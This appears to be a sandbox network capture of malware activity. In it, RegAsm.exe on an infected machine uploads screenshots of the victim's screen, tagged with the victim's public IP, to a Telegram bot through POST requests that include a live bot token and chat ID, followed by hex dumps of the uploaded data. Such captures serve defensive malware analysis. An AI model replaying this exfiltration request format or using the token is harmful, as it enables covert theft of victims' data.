                                                                            34192.168.2.449989149.154.167.2204437588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-09 10:39:24 UTC2113OUTPOST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D [TRUNCATED]
                                                                            Content-Type: multipart/form-data; boundary================8dd55af8716888e
                                                                            Host: api.telegram.org
                                                                            Content-Length: 687751
                                                                            Connection: Keep-Alive
                                                                            2025-01-09 10:39:24 UTC16355OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 35 35 61 66 38 37 31 36 38 38 38 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 44 6f 63 75 6d 65 6e 74 73 5c 4e 4f 56 41 5c 43 61 70 74 75 72 65 64 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48
                                                                            Data Ascii: --===============8dd55af8716888eContent-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\NOVA\Captured.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGBgAMAapH
                                                                            2025-01-09 10:39:24 UTC16355OUTData Raw: 78 92 af 1d 9e dc eb 84 be 00 1c c4 0a 40 4f e2 8d 06 2b f1 2c ef a4 00 04 4f fe 81 27 fd 2c 9e f4 b3 78 82 6f 38 fa 02 b0 4f 9f c1 97 80 e4 02 50 92 6f fc a7 ef 4a 55 7e b9 f8 23 3e 61 d7 bb 0b 62 5f 2f fe d0 31 60 55 04 da 31 6f 03 56 35 a0 04 1e ad 15 76 20 99 97 8f c9 b3 82 0f a1 48 f5 1f 7d bb 17 2d 71 e6 53 ee c2 5b d3 51 df 89 3b dd 91 98 b0 e8 f6 24 02 11 83 b9 00 cc 45 1f a8 02 10 74 ec d7 ce 49 d8 49 00 d2 02 c2 ef 3f 7c fa de ea 88 af f2 90 78 1a 0b ad a1 af ea 41 f2 60 bd 9d ee 4c 7b 69 6f 5a c4 9f c4 a1 95 7e f6 6d c0 aa 04 ac 21 b2 e6 ad ac a4 1f d2 0e 79 27 91 a7 4a 3f 90 f8 cb a5 1f 28 5f 10 2b f6 8a 9f 6f ee f2 24 fa 24 01 25 ff 26 cd a7 ca b0 10 7e 92 7e 9a a7 8f 10 44 ee 21 f5 38 fa 2b b9 47 ab 63 c0 12 84 54 08 4a 02 82 64 21 2f 11 99
                                                                            Data Ascii: x@O+,O',xo8OPoJU~#>ab_/1`U1oV5v H}-qS[Q;$EtII?|xA`L{ioZ~m!y'J?(_+o$$%&~~D!8+GcTJd!/
                                                                            2025-01-09 10:39:24 UTC16355OUTData Raw: fc eb 85 00 1c 60 ff d8 b6 c2 95 7e 16 47 fa 59 ac e4 6b c7 10 31 d7 22 de 6b de ed 02 50 f4 05 a0 4f 5f 00 f6 e9 f3 de 84 7f 07 3c 03 70 60 93 23 42 bb 67 00 a6 97 81 94 82 0e f1 a7 4a c0 34 1e 06 89 40 f5 c1 4a c1 4e 04 20 f3 08 40 c6 9a 23 06 de 91 5f 84 9f ad fa b3 82 d0 ca bf a2 ef 0b c0 ea d9 80 0b 07 e5 9f 9e 07 68 63 08 3d bd f1 57 72 4f 12 90 56 47 80 73 34 6f 85 9e 27 00 d5 4a 06 e6 c2 d0 8a be 1c c9 41 a1 98 8e 0b 83 aa fb 54 e1 a7 63 c0 92 7d aa fa 13 79 be 64 1e f2 0e 41 27 01 28 b9 97 23 99 07 92 79 c4 db 09 40 e2 aa 18 b4 73 e9 3a b3 6f 4c 82 4f cf f9 43 ea 21 ff 10 7f 8c 25 ff 54 f1 a7 1c aa 02 99 93 f4 a3 45 ee d9 0a 40 c5 e9 13 a7 55 1c 01 98 e2 a6 fa 0f a9 07 8c 25 05 ad 00 54 dc 0a 40 7b cc d7 13 74 76 4e 52 4f 79 ca cd e5 9e 72 69 ed
                                                                            Data Ascii: `~GYk1"kPO_<p`#BgJ4@JN @#_hc=WrOVGs4o'JATc}ydA'(#y@s:oLOC!%TE@U%T@{tvNROyri
                                                                            2025-01-09 10:39:24 UTC16355OUTData Raw: 40 f0 44 5f 2b 3c 89 37 1a de 6b 02 d0 93 7c c3 d1 17 80 7d fa 8c 1e fe 1d d4 a7 7e 25 34 36 3e 3c 34 e6 fe 38 20 00 07 10 77 46 fc a5 e7 01 ea 39 7f 06 c5 87 13 80 79 05 a0 40 08 02 12 2f 97 7e 9e 10 d4 78 08 56 da c5 9c fc 99 82 76 2e 8f 49 00 da 98 90 e4 e3 79 81 9d 08 40 c8 2b fc ac e8 a3 95 24 b4 0c 27 00 6d 8c be 9e fd c7 d8 0a c0 ea c8 6f 79 04 98 37 fe 82 04 a0 8e fc 5a 10 80 12 7e 1a 43 51 21 18 f7 2d 65 9e 24 9f 64 9e c6 42 d5 81 c4 41 e2 4f 52 b0 9d 00 94 98 43 c6 e5 82 0e 24 f0 6c 4c 39 42 d2 30 c7 ce d9 75 08 3f da 89 db c5 ef b3 9c ab 44 5f 44 cf 06 54 05 60 92 83 e5 91 5d 2b f8 80 18 42 0f d1 c7 5c 71 ac b7 90 82 12 80 8c 91 7d 3c 03 50 7b 0c 42 5e 81 e4 1f 47 80 69 41 c7 7b 25 f4 90 76 aa ea 53 95 1f 2d 79 f9 bc e6 5a 89 c0 22 af 59 fe 31
                                                                            Data Ascii: @D_+<7k|}~%46><48 wF9y@/~xVv.Iy@+$'moy7Z~CQ!-e$dBAORC$lL9B0u?D_DT`]+B\q}<P{B^GiA{%vS-yZ"Y1
                                                                            2025-01-09 10:39:24 UTC16355OUTData Raw: 93 77 d3 c0 1e 40 3f 8a 3c 5a f6 36 06 48 c0 18 8f fb 44 cc 8f 02 50 f1 17 c7 56 04 2a 01 95 7d e0 d8 dc 28 04 01 11 88 48 b3 82 4f 71 46 df 23 b8 a5 50 83 28 e4 62 df 3c c6 1b df d0 ca 41 84 a2 39 cc e5 aa bc b0 17 63 f7 21 3f e6 51 c5 17 73 23 e6 d3 27 a7 84 f5 60 65 5f 14 81 88 3b 45 5f 8c 2b 02 a3 14 b4 4f 7e ac 22 04 d6 cc 04 e0 12 44 59 55 9b af 49 bd 69 c8 7b bf 8c 04 a0 2c ff 79 e9 cf 7c 95 02 b0 16 ef f7 a4 5f d2 09 41 88 02 30 a2 0c a4 22 70 f4 56 e1 f4 e7 e4 6d c2 15 f9 47 4c f1 47 1b fb 4a bb 99 00 6c a9 49 bf 48 4d da ad 25 35 b9 b7 1c 6a 82 6e 67 33 13 80 29 56 91 72 bb 92 99 00 4c eb d7 90 9a cc 5b 09 35 f9 07 35 a9 37 0d 35 d9 57 a3 26 f5 a6 a1 26 ff a0 26 f9 26 81 e0 5b 8a bd 45 00 22 f6 3c 0e cc fc 6f fe e6 6f 8e e4 21 01 a1 dc 87 31 d5
                                                                            Data Ascii: w@?<Z6HDPV*}(HOqF#P(b<A9c!?Qs#'`e_;E_+O~"DYUIi{,y|_A0"pVmGLGJlIHM%5jng3)VrL[5575W&&&&[E"<oo!1
                                                                            2025-01-09 10:39:24 UTC16355OUTData Raw: a6 b1 f2 2f 56 00 ba d7 e0 98 5b 86 de 15 e8 65 20 1e 01 a6 ea 2f 0a bf 28 00 f3 25 1f 9d bc 1b 47 ac 08 8c b2 0f 14 80 8a 41 84 1f 2d 6b 68 a9 08 8c c7 7d 81 77 08 0e 8f 17 05 a0 d5 80 51 08 f6 15 84 87 df 94 ab fe 90 7f f1 7d 81 c6 95 7e 25 08 3b b1 aa 2f ca 3e e3 31 16 a5 df e0 d0 6b 9b b9 37 5f 97 c7 0a 40 50 02 72 ec 17 d9 47 25 20 6d 3c 06 8c 10 54 e8 29 fa 14 7f 35 11 68 b5 20 f4 62 b0 93 7a c8 3c 50 f6 11 43 fe 8d 08 bf c3 6f c9 30 97 a5 61 8a 2b ef 68 11 7d 4a bf 28 fe 14 82 e6 58 f1 17 a5 1f e3 7e 8f 83 53 ab 64 4b fd 88 e2 0d e8 47 21 07 4a 3a 72 87 64 5d 65 1f aa fe cc 65 6c 3e 63 44 21 63 63 b4 ec ad 34 24 07 e1 67 e5 5e 94 77 0a 3e 88 73 11 05 20 f9 ec a3 3c 54 fe 65 21 b8 df a2 a8 a3 55 fc 89 02 8f 7e 14 7a ce 5b 29 18 21 47 c1 17 e5 5e 7c
                                                                            Data Ascii: /V[e /(%GA-kh}wQ}~%;/>1k7_@PrG% m<T)5h bz<PCo0a+h}J(X~SdKG!J:rd]eel>cD!cc4$g^w>s <Te!U~z[)!G^|
                                                                            2025-01-09 10:39:24 UTC16355OUTData Raw: cb fc f8 c7 3f 1e 2b 00 bf fb dd ef 36 8f 3e fa e8 cb 4c 00 9e da 49 ad ae 62 2d a1 8c 5a 6b 46 a4 d6 87 3e 5c 17 78 ab a5 22 ff a0 26 f5 6a 8c cb ad 7d 57 99 6d cf 65 f1 e7 cf 49 f5 23 ef f3 ab c9 be 08 39 b1 52 32 5e fc 51 fb ae 6a 32 6e a7 e0 51 d9 da 5c a2 26 fd 5a b6 66 e6 ce 79 b2 23 7d 97 cb a1 90 7f 0b 4b 30 df 09 c3 dc 2f 50 08 46 31 38 7f fe f6 0c 37 06 c3 c6 8b 5f ca 6c b8 e8 c5 cc a6 0b 5f 6c 36 6e 79 a1 e5 c2 94 d3 55 07 42 be 50 c4 f7 07 9e 8e dc 4b e4 fe 13 a3 20 0e a9 22 9c 52 f8 95 ec ed 02 70 6a 38 56 dc a1 c4 ab 5d fe 21 0b a7 3c 36 91 9a a4 db 99 ac bd 00 7c a4 27 5e ee 31 38 21 fd df 97 44 8c 2d 07 d7 49 dc bf 46 4d ea 4d 43 4d fe 45 6a d2 2f b2 b3 05 60 4d f0 2d 45 4d fa 45 f6 44 01 88 e8 e3 18 f0 07 3f f8 c1 91 38 63 da 9f fa a9 9f
                                                                            Data Ascii: ?+6>LIb-ZkF>\x"&j}WmeI#9R2^Qj2nQ\&Zfy#}K0/PF187_l_l6nyUBPK "Rpj8V]!<6|'^18!D-IFMMCMEj/`M-EMED?8c
                                                                            2025-01-09 10:39:24 UTC16355OUTData Raw: 69 ed 4a cb dd fc d0 d4 3a e4 a2 ea 3b b2 71 ce 59 b1 2a b5 3e 60 df 11 f3 af ac bf 23 f6 22 77 f3 35 36 b6 5f b6 df e4 d8 5e eb 90 43 f3 ba bc 76 c5 c5 16 bb 77 32 46 25 20 62 af 26 3a ca dc fa f4 af 1a 7c dc d3 08 c2 13 6f b4 7f 68 f2 73 ba 25 ad d8 e3 f8 d4 36 5a 7b ac ae 7e 4e fb ef 91 5a 7f 79 e2 e4 7b b6 cf bf e9 e7 ee 49 e9 e7 17 a5 4d f9 2e f6 ff df b6 ee 27 69 c5 1b ec fb 86 b7 7e cf 3e a7 fd 5e c8 9f f3 b2 1c cf a2 f0 08 fb bd 70 bc bd c6 2f ea 3f b3 6f 3d b6 91 80 59 fe bd ff aa ea 3b 3b c9 be 23 a4 df 81 f6 b9 2d b6 92 f1 2b ea ef ec 60 fb 7e 88 93 0f 07 d6 df 8b 8f 23 e4 06 24 92 7a 5d ac f9 4d 5f 5a e7 d9 ef bf 7e 04 52 6f 21 29 85 60 7c 51 c8 ec 69 9d fb f8 34 d8 fb 08 98 7a 54 b8 17 53 65 e1 20 e4 ea bc 3e e8 92 91 29 97 8d 04 20 0b 25 0e
                                                                            Data Ascii: iJ:;qY*>`#"w56_^Cvw2F% b&:|ohs%6Z{~NZy{IM.'i~>^p/?o=Y;;#-+`~#$z]M_Z~Ro!)`|Qi4zTSe >) %
                                                                            2025-01-09 10:39:24 UTC16355OUTData Raw: 3e 28 85 20 31 c9 3c f0 12 90 96 39 90 00 a4 65 2e 8f eb db 82 11 79 12 7b 4b 76 b3 ef c6 de 2f 63 a0 af 98 a4 9f 8e 10 d3 6f ed 70 69 be 1d d8 1f 0b 56 ab 0b 43 e8 fb e3 c3 1c 0b d6 2d c2 ac 95 14 94 e4 2b 91 24 a4 5f e6 d1 47 f6 51 f5 87 cc 2b 05 20 b1 7e 02 30 e7 f3 ec ba 02 49 41 50 25 a0 97 7f 8c e9 23 00 a9 e8 43 e4 49 fa 49 00 7a 09 c8 7c 96 7d 3b d8 9a fa 08 32 c7 8a 59 8b d8 f3 c7 7e 25 f6 84 2e 0e 11 cc 93 c7 71 e0 09 2a 1a 0b f1 37 29 e6 26 2b fe 10 79 8a 79 c9 87 fc 03 f6 50 25 a0 f2 a8 2c 04 ed 47 8e 50 ac ca e3 35 88 f3 1a f6 19 9d fc 03 09 39 89 3a 90 d8 43 c0 29 56 8a 39 d0 d8 8b 3d 9f ab be 5a ad 41 0c b6 5f ff dd dc 2a 57 79 25 73 13 80 1c ff 7d db 17 d3 a6 17 de 93 d6 9d be b5 6d d6 ca 6c ba 72 5d 4a 17 1d 93 5a 2f f9 0b fb 83 f7 b9 b4
                                                                            Data Ascii: >( 1<9e.y{Kv/copiVC-+$_GQ+ ~0IAP%#CIIz|};2Y~%.q*7)&+yyP%,GP59:C)V9=ZA_*Wy%s}mlr]JZ/
                                                                            2025-01-09 10:39:24 UTC16355OUTData Raw: df 0b 3d 5a 90 00 54 4c 63 cd 4b fe d1 1f 09 c0 40 7a 8d 98 24 92 76 c3 24 92 73 0b 41 24 d3 22 66 bb 6e a6 c4 17 77 4c 12 49 bd 41 88 a4 dd 30 89 a4 de 20 44 d2 6e 98 44 d2 6f 98 84 52 6f 10 d8 63 01 89 e4 de 4c 88 e4 dd 30 88 a4 de 20 3c 9f 04 20 44 f2 0f 3a 81 fc 83 8d 51 00 7a 22 a9 e7 89 d6 78 3a a7 f7 07 c1 e6 e9 da bf 16 80 63 8e ce 29 f6 39 6b bc 0c 94 28 f4 64 09 c8 d1 e0 3e 8c 9f b5 3e b3 68 15 55 80 08 c0 67 a7 48 41 84 60 7e 76 a0 7d 9e aa 3a b0 3e 2a 0c fe 02 91 90 6e 01 28 4a 51 18 c9 bf 4c 20 f8 a6 63 24 00 47 8c 98 99 00 f4 22 b0 14 80 42 73 fe 88 b0 aa 00 bb a4 9e 8d 3d bd 24 61 17 47 dd 91 25 a0 84 21 7d 1d 07 2e 05 60 24 01 25 f6 4a e1 27 31 58 4a 41 09 40 55 fc 95 50 21 e8 c9 31 c4 de e1 b7 e5 6a 40 09 40 60 ae 97 fc 9b 1c 57 32 0f b1
                                                                            Data Ascii: =ZTLcK@z$v$sA$"fnwLIA0 DnDoRocL0 < D:Qz"x:c)9k(d>>hUgHA`~v}:>*n(JQL c$G"Bs=$aG%!}.`$%J'1XJA@UP!1j@@`W2
                                                                            2025-01-09 10:39:25 UTC389INHTTP/1.1 200 OK
                                                                            Server: nginx/1.18.0
                                                                            Date: Thu, 09 Jan 2025 10:39:25 GMT
                                                                            Content-Type: application/json
                                                                            Content-Length: 1828
                                                                            Connection: close
                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            35192.168.2.450008149.154.167.2204437588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-09 10:39:27 UTC2113OUTPOST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D [TRUNCATED]
                                                                            Content-Type: multipart/form-data; boundary================8ddd539019124f7
                                                                            Host: api.telegram.org
                                                                            Content-Length: 695479
                                                                            Connection: Keep-Alive
                                                                            2025-01-09 10:39:27 UTC16355OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 64 35 33 39 30 31 39 31 32 34 66 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 44 6f 63 75 6d 65 6e 74 73 5c 4e 4f 56 41 5c 43 61 70 74 75 72 65 64 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48
                                                                            Data Ascii: --===============8ddd539019124f7Content-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\NOVA\Captured.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGBgAMAapH
                                                                            2025-01-09 10:39:27 UTC16355OUTData Raw: a1 27 79 27 69 07 3e 2f 51 47 cb 58 7b 48 e6 69 ad 62 92 7a be 17 63 bd 04 84 35 8a 4b f2 a9 d2 8f b5 ec cf bc e6 88 d1 4a e0 81 2a f3 24 e7 d4 12 a3 45 00 e6 aa bd 66 ec 79 c4 91 87 c8 3f 5a e5 31 07 f4 89 21 06 4b 01 28 d9 27 a9 e7 b2 4f f3 82 18 79 e4 33 9e a8 00 fc fc 95 81 dc 1b 85 6b 1f aa 4e b9 ee 91 ea 94 1b 1f 4b 3c 5e 9d 75 fb cf aa ab 1e f8 79 75 c7 4f 7f 5e 5d bd e6 91 a1 95 7e fd c8 f7 15 49 bb 49 62 9f 7f 36 d4 c2 af 10 80 54 ff 3d fe e5 ba ff f4 79 d5 b3 37 ee 3f a3 0a f0 b9 3b ea 2a c0 17 7e f4 fe ea 05 04 e0 4f 10 80 cd 31 e0 56 00 7e ba fa ed 03 07 86 22 6f b6 44 12 6f be 91 78 8b a4 dc 28 e8 05 1e c0 51 de 28 67 14 b4 47 24 f2 66 cb 7c 09 c0 53 4f 3d b5 7a f9 b7 bf b5 4a bf 5a 00 4e 8f e3 a3 bf e3 56 ff 65 01 d8 c8 bf 56 00 1e 7d f4 82
                                                                            Data Ascii: 'y'i>/QGX{Hibzc5KJ*$Efy?Z1!K('Oy3kNK<^uyuO^]~IIb6T=y7?;*~O1V~"oDox(Q(gG$f|SO=zJZNVeV}
                                                                            2025-01-09 10:39:27 UTC16355OUTData Raw: 78 25 0a c0 48 f2 0d 23 92 7e 4e 29 f4 4a d6 a6 00 8c 04 df 30 16 04 e0 3d 3d 22 af 5f 7c 18 91 fc 83 48 f4 f5 63 41 00 a6 39 93 7a d0 2f ee 55 80 03 41 e2 35 02 b0 94 80 12 80 5e 01 e8 f2 cf 05 a0 84 5e 84 e6 25 f3 3c 5f fb 97 b9 82 2a 40 d6 b8 f4 73 96 bd f5 b6 16 97 80 92 76 e3 20 a9 07 f4 15 73 ca 5c 97 7d 3a 0a 4c 1f c9 27 e1 a7 79 c5 24 09 c9 95 00 d4 33 04 fd 99 82 c0 b1 5f 97 7e 0e 02 90 4a be 52 f4 d1 d7 18 31 a8 6a 40 e1 63 97 7d 25 92 7c 7a 63 30 f2 af 14 80 3a f2 eb 95 7d 8c 25 fb 68 91 7f 5e 15 28 f2 78 d7 b4 be 11 80 aa ea f3 e3 be 88 3f c6 12 82 ca d7 11 60 64 1c 22 6e f9 6e 37 66 74 b4 57 62 0f e1 27 99 47 1f 5c e2 b5 22 af 41 73 9a 57 f5 9f 62 e5 3a de 06 8c d4 e3 b8 af c4 9f 44 9f f7 25 fd 24 0c 25 0d 91 79 12 80 aa 00 44 f6 d1 42 3e e6
                                                                            Data Ascii: x%H#~N)J0=="_|HcA9z/UA5^^%<_*@sv s\}:L'y$3_~JR1j@c}%|zc0:}%h^(x?`d"nn7ftWb'G\"AsWb:D%$%yDB>
                                                                            2025-01-09 10:39:27 UTC16355OUTData Raw: 98 05 df cd 3d 2c 7e db 2d 19 fa d1 11 62 c9 c2 fc 8c 40 84 1d f2 ae 91 83 5e 29 48 5c b1 7e 48 fc 49 20 4a 10 22 0c 55 35 58 a2 79 1d 25 56 8c b6 dd 67 1f 24 5f ef 0b 43 bc 7a 50 e3 c5 6f 4a 6b 8c a9 3d d2 75 77 bb ae 5a b4 e7 8d d5 b2 7d d2 f7 93 62 f4 89 77 77 bf 3e cf d1 12 63 ce 2b 00 4b 24 fe 5c 02 92 af 35 08 40 55 f5 e5 6a 3e a3 8d b7 15 7e 88 bd ab ab a5 bb 5d 53 2d db 1d c1 87 b8 63 ee aa 1c a3 df dd f1 f2 6a 6a a7 2b f2 78 79 ba 5f 44 df 8a 74 9f 2b d3 7d d2 b2 8f 8e 02 d3 97 0c 24 77 5a 08 5e 9d 8f 06 d3 ba 5c ec c7 14 e2 0d 71 b7 1b 82 30 ad df f1 aa aa bb fd 15 19 fa cc c1 62 44 5d 82 18 68 cc fa ce 76 97 67 e8 03 6b 69 99 67 ad f2 e9 97 d7 d0 fe 2e 02 25 0a 15 cb 42 b0 11 73 a5 b4 a3 a2 8f 96 39 84 9f aa 02 89 d1 92 ef 52 4f 28 be 84 17 66
                                                                            Data Ascii: =,~-b@^)H\~HI J"U5Xy%Vg$_CzPoJk=uwZ}bww>c+K$\5@Uj>~]S-cjj+xy_Dt+}$wZ^\q0bD]hvgkig.%Bs9RO(f
                                                                            2025-01-09 10:39:27 UTC16355OUTData Raw: 5e 22 22 59 75 20 c7 85 93 f7 06 2e 5d 50 7e 4f 03 cb 17 96 fc 4c e2 05 32 49 28 59 fe 46 85 df f2 b9 3d d9 dc 56 d8 15 80 8b 71 58 0b c0 0d 90 89 be 59 ac 91 77 db 20 00 33 69 b7 9d ec 0a c0 f9 2c 22 00 21 95 80 73 c8 44 de 56 58 54 00 ae bc b9 fc 5c 49 5c 32 e9 17 99 27 fb 0e e7 77 00 4a 26 fb 32 90 79 9b 21 13 80 92 09 bf 96 28 f4 66 11 c5 5e 1b 6f c7 91 45 05 20 1c 69 02 30 ca bf 28 00 ad f8 8b f2 0f 10 80 92 09 bf 96 ad 0a c0 38 1f 69 c5 9f 6c b7 00 cc 2a 01 21 ca 3f d8 ac 00 04 8f fd d2 b7 1a 90 3e 02 d0 38 64 02 50 99 d7 56 f7 71 1c 18 1c 93 67 2c ae 69 05 a0 ef fd 73 8c 00 cc 24 a0 15 82 51 d6 29 f5 94 75 1c 0b b6 ca 8f 77 04 32 66 6e cd f1 dd 81 b8 97 c4 aa bf b8 7f db f7 f8 2f 17 84 78 49 08 e2 cf cb 43 14 76 4a bb 28 f6 94 7a c6 a2 c4 b3 55 00
                                                                            Data Ascii: ^""Yu .]P~OL2I(YF=VqXYw 3i,"!sDVXT\I\2'wJ&2y!(f^oE i0(8il*!?>8dPVqg,is$Q)uw2fn/xICvJ(zU
                                                                            2025-01-09 10:39:27 UTC16355OUTData Raw: 23 ca 3d 85 a0 20 06 5b 62 f5 df 4c c9 37 03 aa 01 ad de 9b 05 02 10 b9 17 2b ff 3c f2 ab f0 53 fe 99 c3 18 c1 e7 7b fe 5a e9 27 7d ce 34 99 00 8c 7d a0 cf 45 21 b4 be 03 30 4a 3c a5 9e 55 7d fd dc 0d 53 12 d0 4a 40 2b fd 5c d3 ae 47 00 46 09 d8 0a c0 a3 ca 67 f3 5d 80 08 40 df fd 67 45 20 e2 ae 3d fa ab f4 63 4e f9 27 cc c7 1b 7f c9 a5 8d 02 90 be 63 c5 5f 94 76 ed 98 16 59 67 6c 94 77 61 ae 15 7d ae e5 36 e0 a5 67 5e 33 25 0d 9d ab eb 87 4a bf 58 05 28 88 40 2a fd bc e1 97 16 01 48 8b e8 8b 47 7f 7b e9 17 fb bd cc a3 6d 05 20 37 fd d6 0b 40 9e d1 cf 1b 43 fa 59 01 48 0c 01 38 39 e6 e3 55 e0 29 f9 7c ff 1f 12 af 8a b7 41 0e 66 72 0f da 77 08 d2 af 47 76 4b 1c 90 76 1e d5 45 fa 29 03 39 16 1c 45 1e 31 40 f4 29 fb c8 f7 79 0a c2 28 0d 11 84 c6 5a f1 a6 98
                                                                            Data Ascii: #= [bL7+<S{Z'}4}E!0J<U}SJ@+\GFg]@gE =cN'c_vYglwa}6g^3%JX(@*HG{m 7@CYH89U)|AfrwGvKvE)9E1@)y(Z
                                                                            2025-01-09 10:39:27 UTC16355OUTData Raw: fd 90 7c ca 3f a9 e2 6f 90 81 1c ff ed 05 60 26 f8 d6 63 9b 04 60 5b fd 47 b5 1f c7 81 11 7e d9 2f 24 20 f3 1c 11 a6 1f d7 6e e4 d2 90 c3 52 00 de 80 00 3c 7b a8 fe 43 fe 4d 57 ff 75 df 7f 6f 2f 00 ef be bb 5e 00 f2 c0 0b 4e e9 1e 7c ca ff d6 dd 7f ee 7b bb 7b 6f bb 6d a6 00 bc ec d3 7f dd 5d fe c5 8f 75 1f fe f6 8d 8f 1b 01 78 d6 d9 67 77 07 1f 7e 78 94 57 b4 c8 27 fa b7 de 75 7f f7 0f 87 77 d2 cd e3 d8 0b bf 5b d7 51 d1 16 e3 7f 12 2e b2 60 6c ff be fb ee ef 1e 3a 78 b0 7b d3 5b de 72 44 09 c0 f6 bb f2 e7 ec 2b 00 57 e5 1f d5 81 51 86 ce 15 80 7e 27 03 6b 04 60 fc ae 12 59 b7 13 ac 11 80 b2 46 00 ce a0 0a c0 f2 cf a2 58 11 58 40 ee 55 c1 77 31 ef 05 e4 fd 80 0f 77 7b 2f ed 46 f6 5d fe e8 50 19 d8 5f 32 c2 bb 03 eb 91 61 64 a0 22 b0 40 25 60 ad 08 7c df
                                                                            Data Ascii: |?o`&c`[G~/$ nR<{CMWuo/^N|{{om]uxgw~xW'uw[Q.`l:x{[rD+WQ~'k`YFXX@Uw1w{/F]P_2ad"@%`|
